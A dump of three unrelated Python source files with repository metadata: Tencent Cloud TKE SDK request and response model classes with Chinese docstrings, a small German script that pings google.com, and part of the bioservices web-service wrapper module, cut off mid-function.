"""DescribeExistedInstances返回参数结构体
"""
def __init__(self):
"""
:param ExistedInstanceSet: 已经存在的实例信息数组。
注意:此字段可能返回 null,表示取不到有效值。
:type ExistedInstanceSet: list of ExistedInstance
:param TotalCount: 符合条件的实例数量。
:type TotalCount: int
:param RequestId: 唯一请求 ID,每次请求都会返回。定位问题时需要提供该次请求的 RequestId。
:type RequestId: str
"""
self.ExistedInstanceSet = None
self.TotalCount = None
self.RequestId = None
def _deserialize(self, params):
if params.get("ExistedInstanceSet") is not None:
self.ExistedInstanceSet = []
for item in params.get("ExistedInstanceSet"):
obj = ExistedInstance()
obj._deserialize(item)
self.ExistedInstanceSet.append(obj)
self.TotalCount = params.get("TotalCount")
self.RequestId = params.get("RequestId")
class EnhancedService(AbstractModel):
"""描述了实例的增强服务启用情况与其设置,如云安全,云监控等实例 Agent
"""
def __init__(self):
"""
:param SecurityService: 开启云安全服务。若不指定该参数,则默认开启云安全服务。
:type SecurityService: :class:`tencentcloud.tke.v20180525.models.RunSecurityServiceEnabled`
:param MonitorService: 开启云监控服务。若不指定该参数,则默认开启云监控服务。
:type MonitorService: :class:`tencentcloud.tke.v20180525.models.RunMonitorServiceEnabled`
"""
self.SecurityService = None
self.MonitorService = None
def _deserialize(self, params):
if params.get("SecurityService") is not None:
self.SecurityService = RunSecurityServiceEnabled()
self.SecurityService._deserialize(params.get("SecurityService"))
if params.get("MonitorService") is not None:
self.MonitorService = RunMonitorServiceEnabled()
self.MonitorService._deserialize(params.get("MonitorService"))
class ExistedInstance(AbstractModel):
"""已经存在的实例信息
"""
def __init__(self):
"""
:param Usable: 实例是否支持加入集群(TRUE 可以加入 FALSE 不能加入)。
注意:此字段可能返回 null,表示取不到有效值。
:type Usable: bool
:param UnusableReason: 实例不支持加入的原因。
注意:此字段可能返回 null,表示取不到有效值。
:type UnusableReason: str
:param AlreadyInCluster: 实例已经所在的集群ID。
注意:此字段可能返回 null,表示取不到有效值。
:type AlreadyInCluster: str
:param InstanceId: 实例ID形如:ins-xxxxxxxx。
:type InstanceId: str
:param InstanceName: 实例名称。
注意:此字段可能返回 null,表示取不到有效值。
:type InstanceName: str
:param PrivateIpAddresses: 实例主网卡的内网IP列表。
注意:此字段可能返回 null,表示取不到有效值。
:type PrivateIpAddresses: list of str
:param PublicIpAddresses: 实例主网卡的公网IP列表。
注意:此字段可能返回 null,表示取不到有效值。
:type PublicIpAddresses: list of str
:param CreatedTime: 创建时间。按照ISO8601标准表示,并且使用UTC时间。格式为:YYYY-MM-DDThh:mm:ssZ。
注意:此字段可能返回 null,表示取不到有效值。
:type CreatedTime: str
:param InstanceChargeType: 实例计费模式。取值范围:
PREPAID:表示预付费,即包年包月
POSTPAID_BY_HOUR:表示后付费,即按量计费
CDHPAID:CDH付费,即只对CDH计费,不对CDH上的实例计费。
注意:此字段可能返回 null,表示取不到有效值。
:type InstanceChargeType: str
:param CPU: 实例的CPU核数,单位:核。
注意:此字段可能返回 null,表示取不到有效值。
:type CPU: int
:param Memory: 实例内存容量,单位:GB。
注意:此字段可能返回 null,表示取不到有效值。
:type Memory: int
:param OsName: 操作系统名称。
注意:此字段可能返回 null,表示取不到有效值。
:type OsName: str
:param InstanceType: 实例机型。
注意:此字段可能返回 null,表示取不到有效值。
:type InstanceType: str
"""
self.Usable = None
self.UnusableReason = None
self.AlreadyInCluster = None
self.InstanceId = None
self.InstanceName = None
self.PrivateIpAddresses = None
self.PublicIpAddresses = None
self.CreatedTime = None
self.InstanceChargeType = None
self.CPU = None
self.Memory = None
self.OsName = None
self.InstanceType = None
def _deserialize(self, params):
self.Usable = params.get("Usable")
self.UnusableReason = params.get("UnusableReason")
self.AlreadyInCluster = params.get("AlreadyInCluster")
self.InstanceId = params.get("InstanceId")
self.InstanceName = params.get("InstanceName")
self.PrivateIpAddresses = params.get("PrivateIpAddresses")
self.PublicIpAddresses = params.get("PublicIpAddresses")
self.CreatedTime = params.get("CreatedTime")
self.InstanceChargeType = params.get("InstanceChargeType")
self.CPU = params.get("CPU")
self.Memory = params.get("Memory")
self.OsName = params.get("OsName")
self.InstanceType = params.get("InstanceType")
class ExistedInstancesForNode(AbstractModel):
"""不同角色的已存在节点配置参数
"""
def __init__(self):
"""
:param NodeRole: 节点角色,取值:MASTER_ETCD, WORKER。MASTER_ETCD只有在创建 INDEPENDENT_CLUSTER 独立集群时需要指定。
:type NodeRole: str
:param ExistedInstancesPara: 已存在实例的重装参数
:type ExistedInstancesPara: :class:`tencentcloud.tke.v20180525.models.ExistedInstancesPara`
"""
self.NodeRole = None
self.ExistedInstancesPara = None
def _deserialize(self, params):
self.NodeRole = params.get("NodeRole")
if params.get("ExistedInstancesPara") is not None:
self.ExistedInstancesPara = ExistedInstancesPara()
self.ExistedInstancesPara._deserialize(params.get("ExistedInstancesPara"))
class ExistedInstancesPara(AbstractModel):
"""已存在实例的重装参数
"""
def __init__(self):
"""
:param InstanceIds: 集群ID
:type InstanceIds: list of str
:param InstanceAdvancedSettings: 实例额外需要设置参数信息
:type InstanceAdvancedSettings: :class:`tencentcloud.tke.v20180525.models.InstanceAdvancedSettings`
:param EnhancedService: 增强服务。通过该参数可以指定是否开启云安全、云监控等服务。若不指定该参数,则默认开启云监控、云安全服务。
:type EnhancedService: :class:`tencentcloud.tke.v20180525.models.EnhancedService`
:param LoginSettings: 节点登录信息(目前仅支持使用Password或者单个KeyIds)
:type LoginSettings: :class:`tencentcloud.tke.v20180525.models.LoginSettings`
:param SecurityGroupIds: 实例所属安全组。该参数可以通过调用 DescribeSecurityGroups 的返回值中的sgId字段来获取。若不指定该参数,则绑定默认安全组。(目前仅支持设置单个sgId)
:type SecurityGroupIds: list of str
"""
self.InstanceIds = None
self.InstanceAdvancedSettings = None
self.EnhancedService = None
self.LoginSettings = None
self.SecurityGroupIds = None
def _deserialize(self, params):
self.InstanceIds = params.get("InstanceIds")
if params.get("InstanceAdvancedSettings") is not None:
self.InstanceAdvancedSettings = InstanceAdvancedSettings()
self.InstanceAdvancedSettings._deserialize(params.get("InstanceAdvancedSettings"))
if params.get("EnhancedService") is not None:
self.EnhancedService = EnhancedService()
self.EnhancedService._deserialize(params.get("EnhancedService"))
if params.get("LoginSettings") is not None:
self.LoginSettings = LoginSettings()
self.LoginSettings._deserialize(params.get("LoginSettings"))
self.SecurityGroupIds = params.get("SecurityGroupIds")
class Filter(AbstractModel):
"""过滤器
"""
def __init__(self):
"""
:param Name: 属性名称, 若存在多个Filter时,Filter间的关系为逻辑与(AND)关系。
:type Name: str
:param Values: 属性值, 若同一个Filter存在多个Values,同一Filter下Values间的关系为逻辑或(OR)关系。
:type Values: list of str
"""
self.Name = None
self.Values = None
def _deserialize(self, params):
self.Name = params.get("Name")
self.Values = params.get("Values")
class Instance(AbstractModel):
"""集群的实例信息
"""
def __init__(self):
"""
:param InstanceId: 实例ID
:type InstanceId: str
:param InstanceRole: 节点角色, MASTER, WORKER, ETCD, MASTER_ETCD,ALL, 默认为WORKER
:type InstanceRole: str
:param FailedReason: 实例异常(或者处于初始化中)的原因
:type FailedReason: str
:param InstanceState: 实例的状态(running 运行中,initializing 初始化中,failed 异常)
:type InstanceState: str
"""
self.InstanceId = None
self.InstanceRole = None
self.FailedReason = None
self.InstanceState = None
def _deserialize(self, params):
self.InstanceId = params.get("InstanceId")
self.InstanceRole = params.get("InstanceRole")
self.FailedReason = params.get("FailedReason")
self.InstanceState = params.get("InstanceState")
class InstanceAdvancedSettings(AbstractModel):
"""描述了k8s集群相关配置与信息。
"""
def __init__(self):
"""
:param MountTarget: 数据盘挂载点, 默认不挂载数据盘. 已格式化的 ext3,ext4,xfs 文件系统的数据盘将直接挂载,其他文件系统或未格式化的数据盘将自动格式化为ext4 并挂载,请注意备份数据! 无数据盘或有多块数据盘的云主机此设置不生效。
:type MountTarget: str
:param DockerGraphPath: dockerd --graph 指定值, 默认为 /var/lib/docker
:type DockerGraphPath: str
:param UserScript: base64 编码的用户脚本, 此脚本会在 k8s 组件运行后执行, 需要用户保证脚本的可重入及重试逻辑, 脚本及其生成的日志文件可在节点的 /data/ccs_userscript/ 路径查看, 如果要求节点需要在进行初始化完成后才可加入调度, 可配合 unschedulable 参数使用, 在 userScript 最后初始化完成后, 添加 kubectl uncordon nodename --kubeconfig=/root/.kube/config 命令使节点加入调度
:type UserScript: str
:param Unschedulable: 设置加入的节点是否参与调度,默认值为0,表示参与调度;非0表示不参与调度, 待节点初始化完成之后, 可执行kubectl uncordon nodename使node加入调度.
:type Unschedulable: int
"""
self.MountTarget = None
self.DockerGraphPath = None
self.UserScript = None
self.Unschedulable = None
def _deserialize(self, params):
self.MountTarget = params.get("MountTarget")
self.DockerGraphPath = params.get("DockerGraphPath")
self.UserScript = params.get("UserScript")
self.Unschedulable = params.get("Unschedulable")
class LoginSettings(AbstractModel):
"""描述了实例登录相关配置与信息。
"""
def __init__(self):
"""
:param Password: 实例登录密码。不同操作系统类型密码复杂度限制不一样,具体如下:<br><li>Linux实例密码必须8到16位,至少包括两项[a-z,A-Z]、[0-9] 和 [( ) ` ~ ! @ # $ % ^ & * - + = | { } [ ] : ; ' , . ? / ]中的特殊符号。<br><li>Windows实例密码必须12到16位,至少包括三项[a-z],[A-Z],[0-9] 和 [( ) ` ~ ! @ # $ % ^ & * - + = { } [ ] : ; ' , . ? /]中的特殊符号。<br><br>若不指定该参数,则由系统随机生成密码,并通过站内信方式通知到用户。
注意:此字段可能返回 null,表示取不到有效值。
:type Password: str
:param KeyIds: 密钥ID列表。关联密钥后,就可以通过对应的私钥来访问实例;KeyId可通过接口DescribeKeyPairs获取,密钥与密码不能同时指定,同时Windows操作系统不支持指定密钥。当前仅支持购买的时候指定一个密钥。
注意:此字段可能返回 null,表示取不到有效值。
:type KeyIds: list of str
:param KeepImageLogin: 保持镜像的原始设置。该参数与Password或KeyIds.N不能同时指定。只有使用自定义镜像、共享镜像或外部导入镜像创建实例时才能指定该参数为TRUE。取值范围:<br><li>TRUE:表示保持镜像的登录设置<br><li>FALSE:表示不保持镜像的登录设置<br><br>默认取值:FALSE。
注意:此字段可能返回 null,表示取不到有效值。
:type KeepImageLogin: str
"""
self.Password = None
self.KeyIds = None
self.KeepImageLogin = None
def _deserialize(self, params):
self.Password = params.get("Password")
self.KeyIds = params.get("KeyIds")
self.KeepImageLogin = params.get("KeepImageLogin")
class RunInstancesForNode(AbstractModel):
"""不同角色的节点配置参数
"""
def __init__(self):
"""
:param NodeRole: 节点角色,取值:MASTER_ETCD, WORKER。MASTER_ETCD只有在创建 INDEPENDENT_CLUSTER 独立集群时需要指定。
:type NodeRole: str
:param RunInstancesPara: CVM创建透传参数,json化字符串格式,详见[CVM创建实例](https://cloud.tencent.com/document/product/213/15730)接口,传入公共参数外的其他参数即可,其中ImageId会替换为TKE集群OS对应的镜像。
:type RunInstancesPara: list of str
"""
self.NodeRole = None
self.RunInstancesPara = None
def _deserialize(self, params):
self.NodeRole = params.get("NodeRole")
self.RunInstancesPara = params.get("RunInstancesPara")
class RunMonitorServiceEnabled(AbstractModel):
"""描述了 “云监控” 服务相关的信息
"""
def __init__(self):
"""
:param Enabled: 是否开启[云监控](/document/product/248)服务。取值范围:<br><li>TRUE:表示开启云监控服务<br><li>FALSE:表示不开启云监控服务<br><br>默认取值:TRUE。
:type Enabled: bool
"""
self.Enabled = None
def _deserialize(self, params):
self.Enabled = params.get("Enabled")
class RunSecurityServiceEnabled(AbstractModel):
"""描述了 “云安全” 服务相关的信息
"""
def __init__(self):
"""
:param Enabled: 是否开启[云安全](/document/product/296)服务。取值范围:<br><li>TRUE:表示开启云安全服务<br><li>FALSE:表示不开启云安全服务<br><br>默认取值:TRUE。
:type Enabled: bool
"""
self.Enabled = None
def _deserialize(self, params):
self.Enabled = params.get("Enabled")
| [
"[email protected]"
] | |
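The request/response models above are normally driven through the SDK's TKE client rather than instantiated by hand. The following is only a usage sketch: the credential values and region are placeholders, and the `tke_client` import path and `DescribeClusters` call follow the SDK's usual pattern, which is assumed here rather than shown in this file.

```python
# Hypothetical usage of the models defined above; credentials and region are placeholders.
from tencentcloud.common import credential
from tencentcloud.tke.v20180525 import tke_client, models

cred = credential.Credential("YOUR_SECRET_ID", "YOUR_SECRET_KEY")   # placeholder credentials
client = tke_client.TkeClient(cred, "ap-guangzhou")                 # region is only an example

req = models.DescribeClustersRequest()
req.Limit = 20                                   # page size; the docstring says it defaults to 20

resp = client.DescribeClusters(req)
print(resp.TotalCount)
for cluster in resp.Clusters:
    print(cluster.ClusterId, cluster.ClusterName)
```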
f77ea489f20c231434ca0f1caea9de519cf3ca2f | b7a2a80843fa5141ffb9c7b4439f1d2ac713af30 | /Version2/SystemKommandos.py | 3eb10a56a4624476aab5ba3c18ba953ddb6bde07 | [] | no_license | wunnox/python_grundlagen | df1bc2b9b1b561bd6733ccc25305e799a48e714e | fa84d7aae7332a7acbb3ba7ff0fe2216cc345fc0 | refs/heads/master | 2023-05-01T12:19:23.208445 | 2023-04-16T11:29:01 | 2023-04-16T11:29:01 | 222,099,539 | 2 | 3 | null | 2019-12-19T10:56:43 | 2019-11-16T12:57:54 | Python | UTF-8 | Python | false | false | 323 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import print_function
import os
log = os.popen("ping -c 1 google.com").readlines()
for zeile in log:
print(zeile.replace("\n", ""))
# oder
if os.system("ping -c 1 google.com") == 0:
print("IP ist erreichbar")
else:
print("IP ist NICHT erreichbar")
| [
"[email protected]"
] | |
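The snippet above shells out via `os.popen` and `os.system`. As a point of comparison, here is a sketch of the same reachability check using the standard-library `subprocess` module, which avoids an extra shell and exposes the return code and output directly; a Unix-style `ping -c 1` is assumed, as in the original.

```python
# Same ping check with subprocess instead of os.popen/os.system (Unix-style ping assumed).
import subprocess

result = subprocess.run(
    ["ping", "-c", "1", "google.com"],
    capture_output=True,
    text=True,
)

for line in result.stdout.splitlines():
    print(line)

if result.returncode == 0:
    print("host is reachable")
else:
    print("host is NOT reachable")
```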
7f2cffad15097d2569d02638773032d76f757de4 | 8cbbec003a96286a70549c75233568c9fc668c12 | /src/bioservices/services.py | f853f9840f0a2e9b2b4de0abca30ed64bd0e3206 | [] | no_license | pjshort/bioservices | bce6e623b5d88bf9dbf6ca4a4cfb89a4106b6b5d | 7f2f948a03089cb47f9dda3954f4c0697a0fddee | refs/heads/master | 2020-12-11T03:47:26.414665 | 2014-11-22T14:41:44 | 2014-11-22T14:41:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 30,520 | py | # -*- python -*-
#
# This file is part of bioservices software
#
# Copyright (c) 2013-2014 - EBI-EMBL
#
# File author(s):
# https://github.com/cokelaer/bioservices
#
# Distributed under the GPLv3 License.
# See accompanying file LICENSE.txt or copy at
# http://www.gnu.org/licenses/gpl-3.0.html
#
# documentation: http://packages.python.org/bioservices
#
##############################################################################
#$Id$
"""Modules with common tools to access web resources"""
from __future__ import print_function
import os
import sys
import socket
import platform
import json
from bioservices.settings import BioServicesConfig
# fixing compatiblity python 2 and 3 related to merging or urllib and urllib2 in python 3
try:
#python 3
from urllib.request import urlopen
from urllib.parse import urlparse, urlencode
from urllib.error import HTTPError
from urllib.request import Request
except:
from urllib import urlencode
from urllib2 import urlopen, Request, HTTPError
# This is a hack in case suds is already installed.
# Indeed, we want suds_jurko instead
sys.path = [x for x in sys.path if 'suds-' not in x]
import easydev
from easydev import Logging
__all__ = ["Service", "WSDLService", "RESTService",
"BioServicesError", "REST"]
class BioServicesError(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
# could be part of easydev itself but for now, let us keep it here
# inside bioservices
class DevTools(object):
"""wrapper around useful functions.
See easydev documentation for details.
"""
def check_range(self, a, b, value):
easydev.check_range(a, b, value, strict=False)
def transform_into_list(self, query):
print("deprecated transform_to_list. use tolist instead")
return easydev.tolist(query)
def check_param_in_list(self, param, valid_values):
easydev.check_param_in_list(param, valid_values)
def swapdict(self, d):
return easydev.swapdict(d)
def tolist(self, query):
return easydev.codecs.tolist(query)
def list2string(self, query, sep=",", space=False):
return easydev.codecs.list2string(query, sep=sep, space=space)
def to_json(self, dictionary):
return json.dumps(dictionary)
class Service(Logging):
"""Base class for WSDL and REST classes
.. seealso:: :class:`REST`, :class:`WSDLService`
"""
#: some useful response codes
response_codes = {
200: 'OK',
201: 'Created',
400: 'Bad Request. There is a problem with your input',
404: 'Not found. The resource you requests does not exist',
406: "Not Acceptable. Usually headers issue",
410: 'Gone. The resource you requested was removed.',
415: "Unsupported Media Type",
500: 'Internal server error. Most likely a temporary problem',
503: 'Service not available. The server is being updated, try again later'
}
def __init__(self, name, url=None, verbose=True, requests_per_sec=3):
""".. rubric:: Constructor
:param str name: a name for this service
:param str url: its URL
:param bool verbose: prints informative messages if True (default is
True)
:param requests_per_sec: maximum number of requests per second,
restricted to 3 by default. You can change that value. If you reach the
limit, an error is raised. The reason for this limitation is
that some services (e.g., NCBI) may blacklist your IP.
If you need or can do more (e.g., ChEMBL does not seem to have
restrictions), change the value. You can also have several instances,
but again, if you send too many requests at the same time, your future
requests may be restricted. Currently implemented for REST only.
All instances have an attribute called :attr:`~Service.logging` that
is an instanceof the :mod:`logging` module. It can be used to print
information, warning, error messages::
self.logging.info("informative message")
self.logging.warning("warning message")
self.logging.error("error message")
The attribute :attr:`~Service.debugLevel` can be used to set the behaviour
of the logging messages. If the argument verbose is True, the debugLevel
is set to INFO. If verbose is False, the debugLevel is set to WARNING.
However, you can use the :attr:`debugLevel` attribute to change it to
one of DEBUG, INFO, WARNING, ERROR, CRITICAL. debugLevel=WARNING means
that only WARNING, ERROR and CRITICAL messages are shown.
"""
super(Service, self).__init__(level=verbose)
self.requests_per_sec = requests_per_sec
self._url = url
try:
if self.url is not None:
urlopen(self.url)
except Exception as err:
self.logging.warning("The URL (%s) provided cannot be reached." % self.url)
self.name = name
self._easyXMLConversion = True
# used by HGNC where some XML contains non-utf-8 characters !!
# should be able to fix it with requests once HGNC works again
#self._fixing_unicode = False
#self._fixing_encoding = "utf-8"
self.devtools = DevTools()
self.settings = BioServicesConfig()
def _get_url(self):
return self._url
def _set_url(self, url):
# something more clever here to check the URL e.g. starts with http
if url is not None:
url = url.rstrip("/")
self._url = url
url = property(_get_url, _set_url, doc="URL of this service")
def _get_easyXMLConversion(self):
return self._easyXMLConversion
def _set_easyXMLConversion(self, value):
if isinstance(value, bool) is False:
raise TypeError("value must be a boolean value (True/False)")
self._easyXMLConversion = value
easyXMLConversion = property(_get_easyXMLConversion,
_set_easyXMLConversion,
doc="""If True, xml output from a request are converted to easyXML object (Default behaviour).""")
def easyXML(self, res):
"""Use this method to convert a XML document into an
:class:`~bioservices.xmltools.easyXML` object
The easyXML object provides utilities to ease access to the XML
tag/attributes.
Here is a simple example starting from the following XML
.. doctest::
>>> from bioservices import *
>>> doc = "<xml> <id>1</id> <id>2</id> </xml>"
>>> s = Service("name")
>>> res = s.easyXML(doc)
>>> res.findAll("id")
[<id>1</id>, <id>2</id>]
"""
from bioservices import xmltools
return xmltools.easyXML(res)
def __str__(self):
txt = "This is an instance of %s service" % self.name
return txt
def pubmed(self, Id):
"""Open a pubmed Id into a browser tab
:param Id: a valid pubmed Id in string or integer format.
The URL is a concatenation of the pubmed URL
http://www.ncbi.nlm.nih.gov/pubmed/ and the provided Id.
"""
url = "http://www.ncbi.nlm.nih.gov/pubmed/"
import webbrowser
webbrowser.open(url + str(Id))
def on_web(self, url):
"""Open a URL into a browser"""
import webbrowser
webbrowser.open(url)
def save_str_to_image(self, data, filename):
"""Save string object into a file converting into binary"""
with open(filename,'wb') as f:
import binascii
try:
#python3
newres = binascii.a2b_base64(bytes(data, "utf-8"))
except:
newres = binascii.a2b_base64(data)
f.write(newres)
class WSDLService(Service):
"""Class dedicated to the web services based on WSDL/SOAP protocol.
.. seealso:: :class:`RESTService`, :class:`Service`
"""
_service = "WSDL"
def __init__(self, name, url, verbose=True):
""".. rubric:: Constructor
:param str name: a name e.g. Kegg, Reactome, ...
:param str url: the URL of the WSDL service
:param bool verbose: prints informative messages
The :attr:`serv` give access to all WSDL functionalities of the service.
The :attr:`methods` is an alias to self.serv.methods and returns
the list of functionalities.
"""
super(WSDLService, self).__init__(name, url, verbose=verbose)
self.logging.info("Initialising %s service (WSDL)" % self.name)
try:
#: attribute to access to the methods provided by this WSDL service
from suds.client import Client
self.suds = Client(self.url)
# reference to the service
self.serv = self.suds.service
self._update_settings()
except Exception:
self.logging.error("Could not connect to the service %s " % self.url)
raise Exception
def _update_settings(self):
self.TIMEOUT = self.settings.TIMEOUT
def wsdl_methods_info(self):
methods = self.suds.wsdl.services[0].ports[0].methods.values()
for method in methods:
try:
print('%s(%s) ' % (
method.name,
', '.join('type:%s: %s - element %s' %
(part.type, part.name, part.element) for part in
method.soap.input.body.parts)))
except:
print(method)
def _get_methods(self):
return [x.name for x in
self.suds.wsdl.services[0].ports[0].methods.values()]
wsdl_methods = property(_get_methods,
doc="returns methods available in the WSDL service")
def wsdl_create_factory(self, name, **kargs):
params = self.suds.factory.create(name)
# e.g., for eutils
if "email" in dict(params).keys():
params.email = self.settings.params['user.email'][0]
if "tool" in dict(params).keys():
import bioservices
params.tool = "BioServices, " + bioservices.__version__
for k,v in kargs.items():
from suds import sudsobject
keys = sudsobject.asdict(params).keys()
if k in keys:
params[k] = v
else:
msg = "{0} incorrect. Correct ones are {1}"
self.logging.error(msg.format(k, keys))
return params
def _get_timeout(self):
return self.suds.options.timeout
def _set_timeout(self, value):
self.suds.set_options(timeout=value)
self.settings.TIMEOUT = value
TIMEOUT = property(_get_timeout, _set_timeout)
class RESTbase(Service):
_service = "REST"
def __init__(self, name, url=None, verbose=True):
super(RESTbase, self).__init__(name, url, verbose=verbose)
self.logging.info("Initialising %s service (REST)" % self.name)
self.last_response = None
def http_get(self):
# should return unicode
raise NotImplementedError
def http_post(self):
raise NotImplementedError
def http_put(self):
raise NotImplementedError
def http_delete(self):
raise NotImplementedError
class RESTService(RESTbase):
"""Class to manipulate REST service
You can request an URL with this class that also inherits from
:class:`Service`.
For debugging:
* last_response contains
"""
def __init__(self, name, url=None, verbose=True):
""".. rubric:: Constructor
:param str name: a name e.g. Kegg, Reactome, ...
:param str url: the URL of the REST service
:param str debugLevel: logging level. See :class:`Service`.
"""
super(RESTService, self).__init__(name, url, verbose=verbose)
self.logging.error("Please use REST class instead of RESTService")
self.trials = 5
self.timesleep = 1
def getUserAgent(self):
self.logging.info('getUserAgent: Begin')
try:
import urllib2
urllib_agent = 'Python-urllib/%s' % urllib2.__version__
except:
import urllib
urllib_agent = 'Python-urllib/%s' % urllib.__version__
#clientRevision = ''
clientVersion = ''
user_agent = 'EBI-Sample-Client/%s (%s; Python %s; %s) %s' % (
clientVersion, os.path.basename(__file__),
platform.python_version(), platform.system(),
urllib_agent
)
self.logging.info('getUserAgent: user_agent: ' + user_agent)
self.logging.info('getUserAgent: End')
return user_agent
def request(self, path, format="xml", baseUrl=True):
"""Send a request via an URL to the web service.
:param str path: the request will be formed as self.url+/+path
:param str format: If the expected output is in XML
format then it will be converted with :meth:`easyXML`. If the
returned document is not in XML, format should be set to any other
value.
:param str baseUrl: By default, the path argument is appended to the
:attr:`url` attribute (the main REST URL). However, sometimes, you
would prefer to provide the entire URL yourself (e.g. in psicquic service)
If so, set this baseUrl argument to False.
.. note:: this is a HTTP GET request
.. seealso:: for developers see also the :meth:`_request_timeout`
if the site is down or busy.
.. note:: you can set the timeout of the connection, which is 1000
seconds by default by changing the :attr:`timeout`.
"""
for i in range(0, self.trials):
res = self._get_request(path, format=format, baseUrl=baseUrl)
if res is not None:
break
import time
self.logging.warning("request seemed to have failed.")
if i!=self.trials-1:
print("Trying again trial {}/{}".format(i+1, self.trials))
time.sleep(self.timesleep)
return res
def http_get(self, path, format="xml", baseUrl=True):
return self.request(path, format=format, baseUrl=baseUrl)
def _get_request(self, path, format="xml", baseUrl=True):
if path.startswith(self.url):
url = path
elif baseUrl is False:
url = path
else:
url = self.url + "/" + path
self.logging.debug("REST.bioservices.%s request begins" % self.name)
self.logging.debug("--Fetching url=%s" % url)
if len(url)> 2000:
print(url)
raise ValueError("URL length (%s) exceeds 2000. Please use a differnt URL" % len(url))
try:
res = urlopen(url).read()
if format=="xml":
if self.easyXMLConversion:
#logging.warning("--Conversion to easyXML"),
try:
res = self.easyXML(res)
except Exception as err:
self.logging.warning(err.message)
self.logging.warning("--Conversion to easyXML failed. returns the raw response"),
self.last_response = res
return res
except socket.timeout:
self.logging.warning("Time out. consider increasing the timeout attribute (currently set to {})".format(self.timeout))
except Exception as err:
self.logging.debug(err.message)
self.logging.debug("An exception occured while reading the URL")
self.logging.debug(url)
self.logging.debug("Error caught within bioservices. Invalid requested URL ? ")
def requestPost(self, requestUrl, params, extra=None):
"""request with a POST method.
:param str requestUrl: the entire URL to request
:param dict params: the dictionary of parameter/value pairs
:param str extra: an additional string to add after the params if
needed. Could be useful if a parameter/value cannot be added to the
dictionary. For instance, if a parameter has several values.
Solved in requests module.
.. todo:: parameter paranName with a list of values [v1,v2] can be interpreted as
paramName=v1¶mName=v2
.. note:: this is a HTTP POST request
.. note:: use only by ::`ncbiblast` service so far.
"""
requestData = urlencode(params)
print(requestData)
if extra is not None:
requestData += extra
# Concatenate the two parts.
# Errors are indicated by HTTP status codes.
try:
# Set the HTTP User-agent.
user_agent = self.getUserAgent()
http_headers = {'User-Agent': user_agent}
print(requestUrl)
req = Request(requestUrl, None, http_headers)
# Make the submission (HTTP POST).
print(req)
reqH = urlopen(req, requestData)
jobId = reqH.read()
reqH.close()
except HTTPError as err:
# Trap exception and output the document to get error message.
print(err.read(), file=sys.stderr)
raise
return jobId
def urlencode(self, params):
"""Returns a string compatible with a URL request.
:param dict params: a dictionary. Keys are parameters.
The pair of key/value are converted into a single string by concatenated
the "&key=value" string for each key/value in the dictionary.
::
>>> params = {'a':1, 'b':2}
>>> urlencode(params)
"a=1&b=2"
.. note:: returns "a=1&b=2" or "b=2&a=1" since dictionaries are not ordered. Note
that the first parameter is not preceded by a & sign that you will need
to add.
"""
if isinstance(params, dict) is False:
raise TypeError("Params must be a dictionary.")
postData = urlencode(params)
return postData
import requests # replacement for urllib2 (2-3 times faster)
from requests.models import Response
import requests_cache # use caching wihh requests
#import grequests # use asynchronous requests with gevent
# Note that grequests should be imported after requests_cache. Otherwise,
# one should use a session instance when calling grequests.get, which we do
# here below
class REST(RESTbase):
"""
The ideas (sync/async) and code using requests were inspired by the ChEMBL
python wrapper but significantly changed.
Get one value::
>>> from bioservices import REST
>>> s = REST("test", "https://www.ebi.ac.uk/chemblws")
>>> res = s.get_one("targets/CHEMBL2476.json", "json")
>>> res['organism']
u'Homo sapiens'
Caching has two major benefits. The first is that it speeds up requests if
you repeat them. ::
>>> s = REST("test", "https://www.ebi.ac.uk/chemblws")
>>> s.CACHING = True
>>> # requests will be stored in a local sqlite database
>>> s.get_one("targets/CHEMBL2476")
>>> # Disconnect your wifi and any network connections.
>>> # Without caching you cannot fetch any requests but with
>>> # the CACHING on, you can retrieve previous requests:
>>> s.get_one("targets/CHEMBL2476")
Advantages of requests over urllib:
request length is not limited to 2000 characters
http://www.g-loaded.eu/2008/10/24/maximum-url-length/
"""
content_types = {
'bed': 'text/x-bed',
'default': "application/x-www-form-urlencoded",
'gff3': 'text/x-gff3',
'fasta': 'text/x-fasta',
'json': 'application/json',
"jsonp": "text/javascript",
"nh": "text/x-nh",
'phylip': 'text/x-phyloxml+xml',
'phyloxml': 'text/x-phyloxml+xml',
'seqxml': 'text/x-seqxml+xml',
'txt': 'text/plain',
'text': 'text/plain',
'xml': 'application/xml',
'yaml': 'text/x-yaml'
}
#special_characters = ['/', '#', '+']
def __init__(self, name, url=None, verbose=True, cache=False):
super(REST, self).__init__(name, url, verbose=verbose)
self.CACHE_NAME = self.name + "_bioservices_database"
self._session = None
self.settings.params['cache.on'][0] = cache
if self.CACHING:
#import requests_cache
self.logging.info("Using local cache %s" % self.CACHE_NAME)
requests_cache.install_cache(self.CACHE_NAME)
def delete_cache(self):
import os
if os.path.exists(self.CACHE_NAME + '.sqlite'):
msg = "You are about to delete this bioservices cache %s. proceed y/n"
res = raw_input(msg % self.CACHE_NAME)
if res == "y":
os.remove(self.CACHE_NAME + '.sqlite')
print("done")
else:
print("reply 'y' to delete the file")
def clear_cache(self):
from requests_cache import clear
clear()
def _get_session(self):
if self._session is None:
if self.CACHING is True:
self._session = self._create_cache_session()
else:
self._session = self._create_session()
return self._session
session = property(_get_session)
def _create_session(self):
"""Creates a normal session using HTTPAdapter
max retries is defined in the :attr:`MAX_RETRIES`
"""
self.logging.debug("Creating session (uncached version)")
self._session = requests.Session()
adapter = requests.adapters.HTTPAdapter(max_retries=self.settings.MAX_RETRIES)
#, pool_block=True does not work with asynchronous requests
self._session.mount('http://', adapter)
self._session.mount('https://', adapter)
return self._session
def _create_cache_session(self):
"""Creates a cached session using requests_cache package"""
self.logging.debug("Creating session (cache version)")
if not self._session:
#import requests_cache
self.logging.debug("No cached session created yet. Creating one")
self._session = requests_cache.CachedSession(self.CACHE_NAME,
backend='sqlite', fast_save=self.settings.FAST_SAVE)
return self._session
def _get_caching(self):
return self.settings.params['cache.on'][0]
def _set_caching(self, caching):
self.devtools.check_param_in_list(caching, [True, False])
self.settings.params['cache.on'][0] = caching
# reset the session, which will be automatically created if we
# access to the session attribute
self._session = None
CACHING = property(_get_caching, _set_caching)
def _get_timeout(self):
return self.settings.TIMEOUT
def _set_timeout(self, value):
self.settings.TIMEOUT = value
TIMEOUT = property(_get_timeout, _set_timeout)
def _process_get_request(self, url, session, frmt, data=None, **kwargs):
try:
res = session.get(url, **kwargs)
self.last_response = res
